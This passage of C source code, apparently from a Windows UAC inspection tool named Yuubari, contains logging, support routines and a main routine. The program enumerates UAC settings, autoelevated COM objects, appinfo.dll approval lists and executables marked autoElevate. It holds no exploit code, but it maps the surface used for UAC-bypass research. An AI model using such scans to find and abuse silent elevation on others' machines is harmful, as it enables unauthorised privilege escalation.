VOID FusionScanDirectory(
_In_ LPWSTR lpDirectory,
_In_ OUTPUTCALLBACK OutputCallback);
extern ptrWTGetSignatureInfo WTGetSignatureInfo;
================================================
FILE: Source/Yuubari/global.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: GLOBAL.H
*
* VERSION: 1.54
*
* DATE: 02 Dec 2022
*
* Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#if !defined UNICODE
#error ANSI build is not supported
#endif
#include "shared\libinc.h"
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
#pragma warning(disable: 4091) // 'typedef ': ignored on left of '' when no variable is declared
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#include
#include
#include
#include "shared\ntos\ntos.h"
#include "shared\ntos\ntsxs.h"
#include "shared\ntos\ntbuilds.h"
#include "shared\minirtl.h"
#include "shared\_filename.h"
#include "shared\cmdline.h"
#include "consts.h"
#include "logger.h"
#include "wintrustex.h"
#include "sup.h"
#include "cui.h"
typedef VOID(WINAPI *OUTPUTCALLBACK)(PVOID OutputData);
#include "appinfo.h"
#include "basic.h"
#include "comobj.h"
#include "fusion.h"
#ifdef _DEBUG
#include "tests\test_fusion.h"
#endif
extern ULONG g_NtBuildNumber;
extern BOOL g_VerboseOutput;
================================================
FILE: Source/Yuubari/logger.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: LOGGER.C
*
* VERSION: 1.60
*
* DATE: 17 Jun 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* LoggerCreate
*
* Purpose:
*
* Create log file.
*
*/
HANDLE LoggerCreate(
_In_opt_ LPWSTR lpLogFileName
)
{
WCHAR ch;
LPWSTR fname = lpLogFileName;
HANDLE hFile;
DWORD bytesIO, lastError;
if (lpLogFileName == NULL) {
fname = TEXT("log.log");
}
hFile = CreateFile(fname, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
ch = (WCHAR)0xFEFF;
if (!WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL)) {
lastError = GetLastError();
CloseHandle(hFile);
SetLastError(lastError);
return INVALID_HANDLE_VALUE;
}
}
return hFile;
}
/*
* LoggerWrite
*
* Purpose:
*
* Output text to file.
*
*/
VOID LoggerWrite(
_In_ HANDLE hLogFile,
_In_ LPWSTR lpText,
_In_ BOOL UseReturn
)
{
SIZE_T textLength = 0, bufferSize = 0;
DWORD bytesIO = 0;
LPWSTR Buffer = NULL;
if (lpText == NULL)
return;
textLength = _strlen(lpText);
if (textLength == 0)
return;
if (hLogFile != INVALID_HANDLE_VALUE) {
if (UseReturn) {
if (textLength > (SIZE_MAX / sizeof(WCHAR)) - 3)
return;
bufferSize = (textLength + 3) * sizeof(WCHAR);
}
else {
if (textLength > (SIZE_MAX / sizeof(WCHAR)) - 1)
return;
bufferSize = (textLength + 1) * sizeof(WCHAR);
}
Buffer = (LPWSTR)supHeapAlloc(bufferSize);
if (Buffer) {
_strcpy(Buffer, lpText);
if (UseReturn) _strcat(Buffer, TEXT("\r\n"));
textLength = _strlen(Buffer);
WriteFile(hLogFile, Buffer, (DWORD)(textLength * sizeof(WCHAR)), &bytesIO, NULL);
supHeapFree(Buffer);
}
}
}
================================================
FILE: Source/Yuubari/logger.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2017
*
* TITLE: LOGGER.H
*
* VERSION: 1.0F
*
* DATE: 13 Feb 2017
*
* Header file for the log file writter.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
HANDLE LoggerCreate(
_In_opt_ LPWSTR lpLogFileName
);
VOID LoggerWrite(
_In_ HANDLE hLogFile,
_In_ LPWSTR lpText,
_In_ BOOL UseReturn
);
================================================
FILE: Source/Yuubari/main.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2026
*
* TITLE: MAIN.C
*
* VERSION: 1.61
*
* DATE: 12 Feb 2026
*
* Program entry point.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "Shlobj.h"
BOOL g_VerboseOutput = FALSE;
ULONG g_NtBuildNumber = 0;
HANDLE g_LogFile = INVALID_HANDLE_VALUE;
VOID LoggerWriteHeader(
_In_ LPWSTR lpHeaderData)
{
LoggerWrite(g_LogFile, T_SPLIT, FALSE);
LoggerWrite(g_LogFile, lpHeaderData, FALSE);
LoggerWrite(g_LogFile, T_SPLIT, TRUE);
}
/*
* AppInfoDataOutputCallback
*
* Purpose:
*
* Output callback for AppInfo scan.
*
*/
VOID AppInfoDataOutputCallback(
_In_ UAC_AI_DATA* Data
)
{
LPWSTR lpLog = NULL, Text = NULL;
SIZE_T sz = 0, textLen, nameLen, bufferChars;
if (Data == NULL)
return;
sz = (_strlen(Data->Name) * sizeof(WCHAR));
if (sz == 0 || sz > MAXDWORD - MAX_PATH)
return;
sz += MAX_PATH;
lpLog = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sz);
if (lpLog) {
switch (Data->Type) {
case AiSnapinFile:
Text = TEXT("SnapinFile: ");
break;
case AiManagementConsole:
Text = TEXT("ManagementConsole: ");
break;
case AiAutoApproveEXE:
Text = TEXT("AutoApproveEXE: ");
break;
case AiIncludedPFDirs:
Text = TEXT("IncludedPFDir: ");
break;
case AiIncludedSystemDirs:
Text = TEXT("IncludedSystemDir: ");
break;
case AiExemptedAutoApproveExes:
Text = TEXT("ExemptedAutoApproveExe: ");
break;
case AilpIncludedWindowsDirs:
Text = TEXT("IncludedWindowsDirs: ");
break;
case AiExcludedWindowsDirs:
Text = TEXT("ExcludedWindowsDir: ");
break;
default:
Text = TEXT("Unknown ");
break;
}
_strcpy(lpLog, Text);
textLen = _strlen(Text);
nameLen = _strlen(Data->Name);
bufferChars = sz / sizeof(WCHAR);
if (textLen + nameLen < bufferChars) {
_strcat(lpLog, Data->Name);
LoggerWrite(g_LogFile, lpLog, TRUE);
cuiPrintText(lpLog, TRUE);
}
HeapFree(GetProcessHeap(), 0, lpLog);
}
}
/*
* BasicDataOutputCallback
*
* Purpose:
*
* Output callback for basic UAC settings scan.
*
*/
VOID WINAPI BasicDataOutputCallback(
_In_ UAC_BASIC_DATA* Data
)
{
LPWSTR lpLog = NULL;
SIZE_T sz = 0;
if (Data == NULL)
return;
sz = (_strlen(Data->Name) * sizeof(WCHAR)) + MAX_PATH;
lpLog = (LPWSTR)supHeapAlloc(sz);
if (lpLog) {
_strcpy(lpLog, Data->Name);
_strcat(lpLog, TEXT("="));
if (Data->IsValueBool) {
if (Data->Value == 0)
_strcat(lpLog, TEXT("Disabled"));
else
_strcat(lpLog, TEXT("Enabled"));
}
else {
ultostr(Data->Value, _strend(lpLog));
}
LoggerWrite(g_LogFile, lpLog, TRUE);
cuiPrintText(lpLog, TRUE);
supHeapFree(lpLog);
}
}
/*
* RegistryOutputCallback
*
* Purpose:
*
* Output callback for registry autoelevated objects scan.
*
*/
VOID WINAPI RegistryOutputCallback(
_In_ UAC_REGISTRY_DATA* Data
)
{
UAC_INTERFACE_DATA* InterfaceData;
LPOLESTR OutputString = NULL;
if (Data == NULL)
return;
if (Data->DataType == UacCOMDataVirtualFactory) {
LoggerWrite(g_LogFile, TEXT("VirtualFactory"), TRUE);
}
if ((Data->DataType == UacCOMDataCommonType) ||
(Data->DataType == UacCOMDataVirtualFactory))
{
//
// Output current registry key to show that we are alive.
//
if (Data->Name)
LoggerWrite(g_LogFile, Data->Name, TRUE);
if (Data->Key)
cuiPrintText(Data->Key, TRUE);
if (Data->AppId)
LoggerWrite(g_LogFile, Data->AppId, TRUE);
if (Data->LocalizedString)
LoggerWrite(g_LogFile, Data->LocalizedString, TRUE);
LoggerWrite(g_LogFile, TEXT("\r\n"), TRUE);
}
if (Data->DataType == UacCOMDataInterfaceTypeVF) {
LoggerWrite(g_LogFile, TEXT("VirtualFactory Item"), TRUE);
}
if ((Data->DataType == UacCOMDataInterfaceType) ||
(Data->DataType == UacCOMDataInterfaceTypeVF))
{
InterfaceData = (UAC_INTERFACE_DATA*)(PVOID)Data;
if (InterfaceData->Name) {
LoggerWrite(g_LogFile, InterfaceData->Name, TRUE);
cuiPrintText(InterfaceData->Name, TRUE);
}
if (StringFromCLSID(&InterfaceData->Clsid, &OutputString) == S_OK) {
LoggerWrite(g_LogFile, TEXT("CLSID"), TRUE);
LoggerWrite(g_LogFile, OutputString, TRUE);
cuiPrintText(OutputString, TRUE);
CoTaskMemFree(OutputString);
}
if (StringFromIID(&InterfaceData->IID, &OutputString) == S_OK) {
LoggerWrite(g_LogFile, TEXT("IID"), TRUE);
LoggerWrite(g_LogFile, OutputString, TRUE);
cuiPrintText(OutputString, TRUE);
CoTaskMemFree(OutputString);
}
LoggerWrite(g_LogFile, TEXT("\r\n"), TRUE);
cuiPrintText(TEXT("\r\n"), TRUE);
}
}
/*
* FusionOutputCallback
*
* Purpose:
*
* Output callback for autoelevated applications scan.
*
*/
VOID WINAPI FusionOutputCallback(
_In_ UAC_FUSION_DATA* Data
)
{
LPWSTR lpText;
LPWSTR lpLog = NULL;
SIZE_T sz = 0, keyNameLen, dllNameLen, prefixLen, bufferChars;
UAC_FUSION_DATA_DLL* Dll;
if (Data == NULL)
return;
if (Data->DataType == UacFusionDataCommonType) {
//
// Display only binaries with autoelevation flags if not in verbose output
//
if ((Data->AutoElevateState == AutoElevateUnspecified) && (g_VerboseOutput == FALSE))
return;
//
// Output current filename
//
LoggerWrite(g_LogFile, TEXT("\r\n"), FALSE);
LoggerWrite(g_LogFile, Data->Name, TRUE);
cuiPrintText(Data->Name, TRUE);
//
// If application has autoElevate attribute, report full info
//
if (Data->IsFusion) {
switch (Data->RunLevel.RunLevel) {
case ACTCTX_RUN_LEVEL_AS_INVOKER:
lpText = TEXT("asInvoker");
break;
case ACTCTX_RUN_LEVEL_HIGHEST_AVAILABLE:
lpText = TEXT("highestAvailable");
break;
case ACTCTX_RUN_LEVEL_REQUIRE_ADMIN:
lpText = TEXT("requireAdministrator");
break;
case ACTCTX_RUN_LEVEL_UNSPECIFIED:
default:
lpText = TEXT("unspecified");
break;
}
//RequestedExecutionLevel
LoggerWrite(g_LogFile, lpText, TRUE);
if (Data->RunLevel.UiAccess > 0) {
lpText = TEXT("uiAccess=TRUE");
}
else {
lpText = TEXT("uiAccess=FALSE");
}
//UIAccess state
LoggerWrite(g_LogFile, lpText, TRUE);
//autoElevate state
if (Data->AutoElevateState != AutoElevateUnspecified) {
switch (Data->AutoElevateState) {
case AutoElevateEnabled:
lpText = TEXT("autoElevate=TRUE");
break;
case AutoElevateDisabled:
lpText = TEXT("autoElevate=FALSE");
break;
case AutoElevateExempted:
lpText = TEXT("autoElevate=Exempted");
break;
default:
break;
}
LoggerWrite(g_LogFile, lpText, TRUE);
}
}
else {
// no embedded manifest
lpText = TEXT("Binary without embedded manifest");
LoggerWrite(g_LogFile, lpText, TRUE);
if (Data->IsOSBinary) {
if (Data->IsSignatureValidOrTrusted == FALSE) {
lpText = TEXT("Warning: signature not valid or trusted");
LoggerWrite(g_LogFile, lpText, TRUE);
}
else {
lpText = TEXT("OS binary with valid digital signature");
LoggerWrite(g_LogFile, lpText, TRUE);
}
}
}
if (Data->IsDotNet) {
lpText = TEXT("DotNet");
LoggerWrite(g_LogFile, lpText, TRUE);
}
}
if (Data->DataType == UacFusionDataRedirectedDllType) {
Dll = (UAC_FUSION_DATA_DLL*)Data;
if (Dll->DllName == NULL || Dll->KeyName == NULL)
return;
keyNameLen = _strlen(Dll->KeyName);
dllNameLen = _strlen(Dll->DllName);
if (keyNameLen == 0 || dllNameLen == 0 || keyNameLen > MAXDWORD - dllNameLen - MAX_PATH)
return;
sz = keyNameLen + dllNameLen + MAX_PATH;
lpLog = (LPWSTR)supHeapAlloc(sz);
if (lpLog) {
bufferChars = sz;
_strcpy(lpLog, TEXT("DllRedirection: "));
prefixLen = _strlen(TEXT("DllRedirection: "));
if (prefixLen + keyNameLen + 4 + dllNameLen < bufferChars) {
_strcat(lpLog, Dll->KeyName); // original DLL name from KeyName
_strcat(lpLog, TEXT(" -> "));
_strcat(lpLog, Dll->DllName); // redirected DLL path
LoggerWrite(g_LogFile, lpLog, TRUE);
}
supHeapFree(lpLog);
}
}
}
/*
* ListBasicSettings
*
* Purpose:
*
* Scan basic UAC settings.
*
*/
VOID ListBasicSettings(
VOID
)
{
cuiPrintText(T_BASIC_HEAD, TRUE);
LoggerWriteHeader(T_BASIC_HEAD);
ScanBasicUacData((OUTPUTCALLBACK)BasicDataOutputCallback);
}
/*
* ListCOMFromRegistry
*
* Purpose:
*
* Scan HKEY_CLASSES_ROOT for autoelevated COM objects.
*
*/
VOID ListCOMFromRegistry(
VOID
)
{
INTERFACE_INFO_LIST InterfaceList;
HRESULT hr;
hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
if (FAILED(hr))
return;
RtlSecureZeroMemory(&InterfaceList, sizeof(InterfaceList));
__try {
if (!CoEnumInterfaces(&InterfaceList))
__leave;
cuiPrintText(T_COM_HEAD, TRUE);
LoggerWriteHeader(T_COM_HEAD);
CoListInformation((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);
//
// AutoApproval COM list added since RS1.
//
if (g_NtBuildNumber >= NT_WIN10_REDSTONE1) {
cuiPrintText(T_COM_APPROVE_HEAD, TRUE);
LoggerWriteHeader(T_COM_APPROVE_HEAD);
CoScanAutoApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);
}
cuiPrintText(T_BROKER_APPROVE_HEAD, TRUE);
LoggerWriteHeader(T_BROKER_APPROVE_HEAD);
CoScanBrokerApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);
}
__finally {
if (InterfaceList.List)
supHeapFree(InterfaceList.List);
if (hr == S_OK)
CoUninitialize();
}
}
/*
* ListFusion
*
* Purpose:
*
* Scan Windows directory for autoelevated apps.
*
*/
VOID ListFusion(
VOID
)
{
HMODULE hModule;
WCHAR szPath[MAX_PATH * 2];
RtlSecureZeroMemory(szPath, sizeof(szPath));
_strcpy(szPath, USER_SHARED_DATA->NtSystemRoot);
_strcat(szPath, TEXT("\\system32\\wintrust.dll"));
hModule = LoadLibraryEx(szPath, NULL, 0);
if (hModule != NULL) {
WTGetSignatureInfo = (ptrWTGetSignatureInfo)GetProcAddress(hModule, "WTGetSignatureInfo");
}
//scan Windows first
cuiPrintText(T_WINFILES_HEAD, TRUE);
LoggerWriteHeader(T_WINFILES_HEAD);
/*
#ifdef _DEBUG
FusionScanDirectory(L"C:\\Windows\\system32", (OUTPUTCALLBACK)FusionOutputCallback);
return;
#else*/
FusionScanDirectory(USER_SHARED_DATA->NtSystemRoot, (OUTPUTCALLBACK)FusionOutputCallback);
//scan program files next
cuiPrintText(T_PFDIRFILES_HEAD, TRUE);
LoggerWriteHeader(T_PFDIRFILES_HEAD);
RtlSecureZeroMemory(szPath, sizeof(szPath));
if (SUCCEEDED(SHGetFolderPath(NULL,
CSIDL_PROGRAM_FILES,
NULL,
SHGFP_TYPE_CURRENT,
(LPWSTR)&szPath)))
{
FusionScanDirectory(szPath, (OUTPUTCALLBACK)FusionOutputCallback);
}
//#endif
}
/*
* ListAppInfo
*
* Purpose:
*
* Scan memory of appinfo.dll.
*
*/
VOID ListAppInfo(
VOID
)
{
WCHAR szFileName[MAX_PATH * 2];
cuiPrintText(T_APPINFO_HEAD, TRUE);
LoggerWriteHeader(T_APPINFO_HEAD);
/*#ifndef _DEBUG*/
_strcpy(szFileName, USER_SHARED_DATA->NtSystemRoot);
_strcat(szFileName, TEXT("\\system32\\appinfo.dll"));
/*#else
_strcpy(szFileName, TEXT("C:\\appinfo\\19041.dll"));
#endif*/
ScanAppInfo(szFileName, (OUTPUTCALLBACK)AppInfoDataOutputCallback);
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
ULONG l = 0;
WCHAR szBuffer[MAX_PATH + 1];
RTL_OSVERSIONINFOW osv;
__security_init_cookie();
HeapSetInformation(GetProcessHeap(), HeapEnableTerminationOnCorruption, NULL, 0);
cuiInitialize(FALSE, NULL);
cuiPrintText(T_PROGRAM_TITLE, TRUE);
RtlSecureZeroMemory(&osv, sizeof(osv));
osv.dwOSVersionInfoSize = sizeof(osv);
RtlGetVersion((RTL_OSVERSIONINFOW*)&osv);
g_NtBuildNumber = osv.dwBuildNumber;
if (g_NtBuildNumber < YUUBARI_MIN_SUPPORTED_NT_BUILD) {
cuiPrintText(TEXT("[UacView] Unsupported Windows version."), TRUE);
ExitProcess(0);
}
if (g_NtBuildNumber > YUUBARI_MAX_SUPPORTED_NT_BUILD) {
cuiPrintText(TEXT("\r\n[UacView] Not all features available for this build\r\n"), TRUE);
}
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
GetCommandLineParam(GetCommandLine(), 1, (LPWSTR)&szBuffer, MAX_PATH, &l);
if (_strcmpi(szBuffer, TEXT("/?")) == 0) {
MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAM_NAME, MB_ICONINFORMATION);
ExitProcess(0);
}
else {
g_VerboseOutput = (_strcmpi(szBuffer, TEXT("/v")) == 0);
}
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, TEXT("uac"));
ultostr(g_NtBuildNumber, _strend(szBuffer));
_strcat(szBuffer, TEXT(".log"));
g_LogFile = LoggerCreate(szBuffer);
if (g_LogFile != INVALID_HANDLE_VALUE) {
cuiPrintText(TEXT("Output will be logged to the file"), TRUE);
cuiPrintText(szBuffer, TRUE);
}
ListBasicSettings();
ListAppInfo();
ListCOMFromRegistry();
ListFusion();
if (g_LogFile != INVALID_HANDLE_VALUE)
CloseHandle(g_LogFile);
ExitProcess(0);
}
================================================
FILE: Source/Yuubari/sup.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: SUP.C
*
* VERSION: 1.60
*
* DATE: 17 Jun 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* supIsCorImageFile
*
* Purpose:
*
* Return true if image has CliHeader entry, false otherwise.
*
*/
BOOL supIsCorImageFile(
_In_ PVOID ImageBase
)
{
ULONG sz = 0;
IMAGE_COR20_HEADER* CliHeader;
CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);
return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));
}
/*
* supReadKeyString
*
* Purpose:
*
* Read string value from registry key.
*
*/
LPWSTR supReadKeyString(
_In_ HKEY hKey,
_In_ LPWSTR KeyValue,
_In_ PDWORD pdwDataSize
)
{
LRESULT lRet;
LPWSTR lpString = NULL;
if (pdwDataSize == NULL)
return NULL;
lRet = RegQueryValueEx(hKey, KeyValue, NULL,
NULL, NULL, pdwDataSize);
if (lRet == ERROR_SUCCESS) {
lpString = (LPWSTR)supHeapAlloc(*pdwDataSize);
if (lpString != NULL) {
lRet = RegQueryValueEx(hKey, KeyValue, NULL,
NULL, (LPBYTE)lpString, pdwDataSize);
if (lRet != ERROR_SUCCESS) {
supHeapFree(lpString);
lpString = NULL;
}
}
}
return lpString;
}
/*
* supQueryKeyName
*
* Purpose:
*
* Get key name from handle.
*
*/
PVOID supQueryKeyName(
_In_ HKEY hKey,
_Out_opt_ PSIZE_T ReturnedLength
)
{
NTSTATUS status;
ULONG ulen = 0;
SIZE_T sz = 0;
PVOID ReturnBuffer = NULL;
POBJECT_NAME_INFORMATION pObjName = NULL;
if (ReturnedLength)
*ReturnedLength = 0;
NtQueryObject(hKey, ObjectNameInformation, NULL, 0, &ulen);
pObjName = (POBJECT_NAME_INFORMATION)supHeapAlloc(ulen);
if (pObjName) {
status = NtQueryObject(hKey, ObjectNameInformation, pObjName, ulen, NULL);
if (NT_SUCCESS(status)) {
if ((pObjName->Name.Buffer != NULL) && (pObjName->Name.Length > 0)) {
sz = pObjName->Name.Length + sizeof(UNICODE_NULL);
ReturnBuffer = supHeapAlloc(sz);
if (ReturnBuffer) {
RtlCopyMemory(ReturnBuffer, pObjName->Name.Buffer, pObjName->Name.Length);
if (ReturnedLength)
*ReturnedLength = sz;
}
}
}
supHeapFree(pObjName);
}
return ReturnBuffer;
}
/*
* supIsProcess32bit
*
* Purpose:
*
* Return TRUE if given process is under WOW64, FALSE otherwise.
*
*/
BOOLEAN supIsProcess32bit(
_In_ HANDLE hProcess
)
{
NTSTATUS status;
PROCESS_EXTENDED_BASIC_INFORMATION pebi;
if (hProcess == NULL) {
return FALSE;
}
//query if this is wow64 process
RtlSecureZeroMemory(&pebi, sizeof(pebi));
pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
if (NT_SUCCESS(status)) {
return (pebi.IsWow64Process == 1);
}
return FALSE;
}
/*
* supFindPattern
*
* Purpose:
*
* Lookup pattern in buffer.
*
*/
PVOID supFindPattern(
_In_ CONST PBYTE Buffer,
_In_ SIZE_T BufferSize,
_In_ CONST PBYTE Pattern,
_In_ SIZE_T PatternSize
)
{
PBYTE p0 = Buffer, pnext;
if (PatternSize == 0)
return NULL;
if (BufferSize < PatternSize)
return NULL;
do {
pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);
if (pnext == NULL)
break;
BufferSize -= (ULONG_PTR)(pnext - p0);
if (BufferSize < PatternSize)
return NULL;
if (memcmp(pnext, Pattern, PatternSize) == 0)
return pnext;
p0 = pnext + 1;
--BufferSize;
} while (BufferSize > 0);
return NULL;
}
/*
* supRegReadDword
*
* Purpose:
*
* Read DWORD value from given key.
*
*/
LRESULT supRegReadDword(
_In_ HKEY hKey,
_In_ LPWSTR lpValueName,
_In_ LPDWORD Value
)
{
LRESULT lResult;
DWORD dwValue = 0, bytesIO;
bytesIO = sizeof(DWORD);
lResult = RegQueryValueEx(hKey, lpValueName,
NULL, NULL,
(LPBYTE)&dwValue, &bytesIO);
if (lResult == ERROR_SUCCESS) {
if (Value)
*Value = dwValue;
}
return lResult;
}
/*
* supLookupImageSectionByName
*
* Purpose:
*
* Lookup section pointer and size for section name.
*
*/
PVOID supLookupImageSectionByName(
_In_ CHAR* SectionName,
_In_ ULONG SectionNameLength,
_In_ PVOID DllBase,
_Out_ PULONG SectionSize
)
{
BOOLEAN bFound = FALSE;
ULONG i;
PVOID Section;
IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);
IMAGE_SECTION_HEADER* SectionTableEntry;
//
// Assume failure.
//
if (SectionSize)
*SectionSize = 0;
if (NtHeaders == NULL)
return NULL;
SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +
sizeof(ULONG) +
sizeof(IMAGE_FILE_HEADER) +
NtHeaders->FileHeader.SizeOfOptionalHeader);
//
// Locate section.
//
i = NtHeaders->FileHeader.NumberOfSections;
while (i > 0) {
if (_strncmp_a(
(CHAR*)SectionTableEntry->Name,
SectionName,
SectionNameLength) == 0)
{
bFound = TRUE;
break;
}
i -= 1;
SectionTableEntry += 1;
}
//
// Section not found, abort scan.
//
if (!bFound)
return NULL;
Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);
if (SectionSize)
*SectionSize = SectionTableEntry->Misc.VirtualSize;
return Section;
}
/*
* supConcatenatePaths
*
* Purpose:
*
* Concatenate 2 paths.
*
*/
BOOL supConcatenatePaths(
_Inout_ LPWSTR Target,
_In_ LPCWSTR Path,
_In_ SIZE_T TargetBufferSize
)
{
SIZE_T TargetLength, PathLength;
BOOL NeedSeparator;
SIZE_T EndingLength;
SIZE_T i;
if (Target == NULL || Path == NULL || TargetBufferSize == 0)
return FALSE;
// Find current target length.
TargetLength = 0;
while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)
TargetLength++;
if (TargetLength >= TargetBufferSize)
return FALSE;
// Strip trailing backslash from target, but preserve a lone backslash.
if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\')) {
// Do not strip if the target is exactly a single backslash.
if (!(TargetLength == 1 && Target[0] == TEXT('\\')))
{
TargetLength--;
}
}
// Strip leading backslash from path only if target is non‑empty.
if (TargetLength > 0 && Path[0] == TEXT('\\'))
Path++;
// Find path length (after possible stripping).
PathLength = 0;
while (Path[PathLength] != 0)
PathLength++;
// Determine if a separator is needed based on target's last character.
NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\'));
EndingLength = TargetLength + (NeedSeparator ? 1 : 0) + PathLength + 1;
if (EndingLength > TargetBufferSize)
return FALSE;
// Insert separator if needed.
if (NeedSeparator) {
Target[TargetLength] = TEXT('\\');
TargetLength++;
}
// Copy the path.
for (i = 0; i < PathLength; i++)
Target[TargetLength + i] = Path[i];
Target[TargetLength + PathLength] = 0;
return TRUE;
}
================================================
FILE: Source/Yuubari/sup.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2021
*
* TITLE: SUP.H
*
* VERSION: 1.52
*
* DATE: 23 Nov 2021
*
* Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
/*
* supHeapAlloc
*
* Purpose:
*
* Wrapper for RtlAllocateHeap.
*
*/
PVOID FORCEINLINE supHeapAlloc(
_In_ SIZE_T Size)
{
return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Size);
}
/*
* supHeapFree
*
* Purpose:
*
* Wrapper for RtlFreeHeap.
*
*/
BOOL FORCEINLINE supHeapFree(
_In_ PVOID Memory)
{
return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);
}
BOOL supIsCorImageFile(
_In_ PVOID ImageBase);
LPWSTR supReadKeyString(
_In_ HKEY hKey,
_In_ LPWSTR KeyValue,
_In_ PDWORD pdwDataSize);
PVOID supQueryKeyName(
_In_ HKEY hKey,
_Out_opt_ PSIZE_T ReturnedLength);
BOOLEAN supIsProcess32bit(
_In_ HANDLE hProcess);
PVOID supFindPattern(
_In_ CONST PBYTE Buffer,
_In_ SIZE_T BufferSize,
_In_ CONST PBYTE Pattern,
_In_ SIZE_T PatternSize);
LRESULT supRegReadDword(
_In_ HKEY hKey,
_In_ LPWSTR lpValueName,
_In_ LPDWORD Value);
PVOID supLookupImageSectionByName(
_In_ CHAR* SectionName,
_In_ ULONG SectionNameLength,
_In_ PVOID DllBase,
_Out_ PULONG SectionSize);
BOOL supConcatenatePaths(
_Inout_ LPWSTR Target,
_In_ LPCWSTR Path,
_In_ SIZE_T TargetBufferSize);
================================================
FILE: Source/Yuubari/tests/test_fusion.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: TEST_FUSION.C
*
* VERSION: 1.21
*
* DATE: 03 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "fusion.h"
BYTE TestArray[1024 * 32] = { 0 };
VOID TestActivationContext(
VOID
)
{
}
================================================
FILE: Source/Yuubari/tests/test_fusion.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2017
*
* TITLE: TEST_FUSION.H
*
* VERSION: 1.10
*
* DATE: 20 Feb 2017
*
